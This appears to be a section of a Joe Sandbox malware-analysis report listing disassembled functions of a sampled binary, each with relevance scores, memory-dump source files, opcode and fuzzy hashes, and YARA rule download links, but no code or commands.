                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c488dd33e8fbb11995f9add815f46f535b0c11122568a5b36fac13d582d535a4
                                                                                                                                                            • Instruction ID: 7c49200c11a98949936d1ad0f390ea882eb4497a64f9ff9353861b0083eb10e6
                                                                                                                                                            • Opcode Fuzzy Hash: c488dd33e8fbb11995f9add815f46f535b0c11122568a5b36fac13d582d535a4
                                                                                                                                                            • Instruction Fuzzy Hash: CB419E74218340ABD720DF14D990B2AF7E6EB85714F1888AEF5C99B351E331EC10CB62
                                                                                                                                                            Function 00BA2030 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 20cc685370adf2de73103e96a5d9b3ff2f3bcb4e013e965f7e500c6377309adf
                                                                                                                                                            • Instruction ID: e3342fe090204af747d7d73916e0294290a388665994bc09a9164c8d7131bd35
                                                                                                                                                            • Opcode Fuzzy Hash: 20cc685370adf2de73103e96a5d9b3ff2f3bcb4e013e965f7e500c6377309adf
                                                                                                                                                            • Instruction Fuzzy Hash: 4241D672A0C3654FD75CCF29C49023ABBE2ABC5300F19866EE4D6873D4DA748945D781
                                                                                                                                                            Function 00BA1E93 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 852d5a4cc655512751e715b528ce9adaa19d5c69dd0e42e1f47ce06565d2ebfc
                                                                                                                                                            • Instruction ID: 694f238f6724457d957f53ca6806ad745bd540362169ad8310abd857011844bc
                                                                                                                                                            • Opcode Fuzzy Hash: 852d5a4cc655512751e715b528ce9adaa19d5c69dd0e42e1f47ce06565d2ebfc
                                                                                                                                                            • Instruction Fuzzy Hash: B041DC7450C380ABD320AB58C884A2EFBF5FB86354F144D5DF6C497292C376E8148B6A
                                                                                                                                                            Function 00BD8D8A Relevance: .1, Instructions: 124COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a47290d0e0dd7133d716484af13fc9467c76aa17c0c2db394aaa9444151d17fd
                                                                                                                                                            • Instruction ID: 123e656341096cd92b6a8b869585c31a8468dd2f12b1086241abaf3b41890181
                                                                                                                                                            • Opcode Fuzzy Hash: a47290d0e0dd7133d716484af13fc9467c76aa17c0c2db394aaa9444151d17fd
                                                                                                                                                            • Instruction Fuzzy Hash: 9041A0316082548FC704DF68C49052EFBE6EF99301F198A6ED4D9973A1EB75DD018B82
                                                                                                                                                            Function 00BAD961 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: de02f80b4dae5b60388ad5b96976aa0058a769112edcfcc33483255cf6e11bb2
                                                                                                                                                            • Instruction ID: ac5538c739f745e5a8563b7fa20ac8e684bc7cf3d7618263b7efae6f77e053a0
                                                                                                                                                            • Opcode Fuzzy Hash: de02f80b4dae5b60388ad5b96976aa0058a769112edcfcc33483255cf6e11bb2
                                                                                                                                                            • Instruction Fuzzy Hash: 3B41AEB16083818BD7309F14C881BAFB7F0FF96360F040999E58A8BB91E7748940CB57
                                                                                                                                                            Function 00BCF030 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c5be6113664422e96713363ec41851647c31506b086c17a8b3ff98e201e465e1
                                                                                                                                                            • Instruction ID: 4fdad7fa309852586f0a7227824fcbd2d41ae31394decc008e9499cf8283db76
                                                                                                                                                            • Opcode Fuzzy Hash: c5be6113664422e96713363ec41851647c31506b086c17a8b3ff98e201e465e1
                                                                                                                                                            • Instruction Fuzzy Hash: D02107329082254BC3249F59C481A3BF7E6EB99B05F0686BED9C4A7295E3359C1487E2
                                                                                                                                                            Function 00BD67EF Relevance: .1, Instructions: 101COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ee3a5fd27d1a6aa8703e7d7e0ce124d38832c0d47e487eb03beab567c4b749af
                                                                                                                                                            • Instruction ID: 93fce9e40d215efb1bdd08fc1b9539e1476a850508fdefbcc1de407f6864f861
                                                                                                                                                            • Opcode Fuzzy Hash: ee3a5fd27d1a6aa8703e7d7e0ce124d38832c0d47e487eb03beab567c4b749af
                                                                                                                                                            • Instruction Fuzzy Hash: 993134705183829AD714CF14C4A062FFBF0EF96784F50584EF4C8AB262E739D985CB9A
                                                                                                                                                            Function 00BB5E70 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f66ca34ebb2079d0d15a2bdf692421591a8bd7b5cc8f78a77493f51220c08205
                                                                                                                                                            • Instruction ID: 2c5703d2a5c35f1130023d266caf82b443c63ddd67c803f51a3c69c687f36990
                                                                                                                                                            • Opcode Fuzzy Hash: f66ca34ebb2079d0d15a2bdf692421591a8bd7b5cc8f78a77493f51220c08205
                                                                                                                                                            • Instruction Fuzzy Hash: AB21B2705086019BC321AF18C841ABBF7F4EF92764F44895CF4D59B292E374D900CBA3
                                                                                                                                                            Function 00B949A0 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: cbe2eee255ce80e2df90ed4850d7395439c2c852be5922ee4a7cea5853ec6c97
                                                                                                                                                            • Instruction ID: cd50a36f8d221a5a245004eaec54ea7ced54f85a3ec7943ffbdf384bbd728e7c
                                                                                                                                                            • Opcode Fuzzy Hash: cbe2eee255ce80e2df90ed4850d7395439c2c852be5922ee4a7cea5853ec6c97
                                                                                                                                                            • Instruction Fuzzy Hash: C531C5316582009FDB149E58D880E2BB7E1EF8A359F1889BDE89A9B251D331DC53CB46
                                                                                                                                                            Function 00BD64B8 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 94e146d9510df87fe14ad3e7ca436616bf561634af1a2056802870b744e4a079
                                                                                                                                                            • Instruction ID: f55f267c69589aa325dc29c3458d6e61436d614eec251c9e2a801b536c070b7d
                                                                                                                                                            • Opcode Fuzzy Hash: 94e146d9510df87fe14ad3e7ca436616bf561634af1a2056802870b744e4a079
                                                                                                                                                            • Instruction Fuzzy Hash: 4E21957460C2409BC704EF19D480A2EFBE2FB95758F28885DE4C487362E734AC60CF62
                                                                                                                                                            Function 00BD5700 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: cf67bcf35caa6f93cf5dee7c1d2c1973a377fa7fa51f0b8f8fa5c61966793b74
                                                                                                                                                            • Instruction ID: 44f067cfc38504a418fe38b70de6b54d9e1e984a329ad0811a5ac05f7bd1af0e
                                                                                                                                                            • Opcode Fuzzy Hash: cf67bcf35caa6f93cf5dee7c1d2c1973a377fa7fa51f0b8f8fa5c61966793b74
                                                                                                                                                            • Instruction Fuzzy Hash: CD11A07591C280EBC311AF28E884A1BFBF5EF86B11F158869E4C49B311E735D811CB93
                                                                                                                                                            Function 00BCB650 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                            • Instruction ID: 07f856953508b88ece0568493d495b3cf1aed652888ee832201b321784cdfe46
                                                                                                                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                            • Instruction Fuzzy Hash: 6911A332A051D40AC3168D3CC440E69BFE25AA3234F5943EDE4F49B2D2D7228D8A9354
                                                                                                                                                            Function 00BC0B80 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 90022ddfb32469098a8610d4b68e70bc315f5b0e8987f5b71d64abe4c0da561b
                                                                                                                                                            • Instruction ID: 3fc2d59ff9e486c548b0de9a39b01c6c8e3a1159c7cc75ad04cd5d9961bd423b
                                                                                                                                                            • Opcode Fuzzy Hash: 90022ddfb32469098a8610d4b68e70bc315f5b0e8987f5b71d64abe4c0da561b
                                                                                                                                                            • Instruction Fuzzy Hash: D501B1F5A2030287EB20FE1094D0F3BB2E9AF94718F0945BCE81A47202DB72EC04C2A5
                                                                                                                                                            Function 00BBD1E1 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
